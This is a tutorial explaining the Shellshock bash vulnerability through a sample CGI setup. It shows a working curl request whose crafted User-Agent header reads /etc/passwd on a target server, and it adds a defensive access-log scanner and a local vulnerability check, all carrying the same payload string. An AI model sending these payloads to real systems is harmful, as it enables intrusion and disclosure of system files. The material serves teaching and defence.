What is Shellshock vulnerability

In This Article

  • What the security vulnerability known as Shellshock is
  • How an exploit can happen

What is ShellShock vulnerability

ShellShock is a vulnerability in bash, one of the most commonly used shell (command-line interpreter) programs on Linux. Exploiting this vulnerability results in arbitrary code execution (ACE). Any service on a target system that passes arguments from a client machine to bash for processing (e.g. a bash CGI script) could be vulnerable.

A sample exploit

Let's look at a sample case of a ShellShock exploit.

On machine A, with bash (currently my bash version is 4.2.39(1)) and the Apache server installed and running,

create the file /var/www/cgi-bin/test.cgi with the following content:

#!/bin/bash
echo "Content-type: text/plain"
echo ""
echo "Sample bash CGI script"

and run the following commands as the root user to give the CGI script the required permissions:

[user@localhost ~]$ chown apache.apache test.cgi


[user@localhost ~]$ chmod u+x test.cgi

Now, from machine B (another Linux box), access http://<machine A ip address>/cgi-bin/test.cgi using a browser and you will see the line “Sample bash CGI script”.

Now let's try the same from the command line (shell) on machine B.

[user@localhost ~]$ curl http://<machine A ip address>/cgi-bin/test.cgi

You will see the same “Sample bash CGI script” as the output.

Now, to see the /etc/passwd file, which holds information on all users of the target machine, you just have to do the following:

[user@localhost ~]$ curl -H "User-Agent:() { :; }; echo;/bin/cat /etc/passwd" http://<machine A ip address>/cgi-bin/test.cgi


What is happening here

When we request a web page, the requesting program (e.g. a browser) passes the URL, the parameters and some header information such as the browser name, HTTP version, method (GET/POST), etc. When the HTTP server hands these values to a bash program (for a CGI script, as environment variables), bash parses them, and the vulnerability causes the arbitrary command part to be executed on the target machine.
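
On the defending side, the same marker can be searched for in the web server's access log. The script below is an added example, not part of the original article: it assumes Apache's "combined" log format, the function names sample_log and shellshock_hits are hypothetical, and the log lines are constructed. It flags only quoted fields that begin with "() {", because bash treats a value as a function definition only when it starts with those characters.

```shell
#!/bin/sh
# Added example: list access-log entries whose quoted fields start with "() {".
# Assumes Apache "combined" format:
#   client - - [time] "request" status bytes "referer" "user-agent"

# Constructed sample log lines (documentation addresses, not real traffic).
sample_log() {
cat <<'EOF'
192.0.2.10 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 23 "-" "curl/7.32.0"
192.0.2.77 - - [25/Sep/2014:10:03:41 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 1873 "-" "() { :; }; echo;/bin/cat /etc/passwd"
192.0.2.10 - - [25/Sep/2014:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (test () { agent)"
192.0.2.78 - - [25/Sep/2014:10:07:13 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 23 "() { :;}; echo Vulnerable" "Mozilla/5.0"
EOF
}

# Print "client timestamp field-name" for every suspicious quoted field.
# Reads the files given as arguments, or standard input when there are none.
shellshock_hits() {
    awk -F'"' '
    BEGIN {
        # With a double quote as separator, even-numbered pieces are the
        # quoted fields of the combined format.
        names[2] = "request"; names[4] = "referer"; names[6] = "user-agent"
    }
    {
        split($1, pre, " ")          # pre[1] = client, pre[4] = "[" + timestamp
        for (i = 2; i <= NF; i += 2) {
            # Flag the marker only at the very start of a field; the same
            # characters later in a string do not trigger the import.
            if (index($i, "() {") == 1) {
                name = (i in names) ? names[i] : "other"
                print pre[1], substr(pre[4], 2), name
            }
        }
    }' "$@"
}

# Stand-alone run over the constructed sample.
sample_log | shellshock_hits
```

A header value that itself contains an escaped double quote shifts the field positions, so the reported field name can be wrong for such lines even though the line is still examined.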


The solution for Shellshock is to upgrade to a bash version in which this is fixed. To check whether your bash has this vulnerability, use the following command:

[user@localhost ~]$ env tst='() { :;}; echo Vulnerable' bash -c :

If the above command outputs ‘Vulnerable’, your shell is vulnerable to the Shellshock attack. If it exits quietly, the installed bash shell is safe.

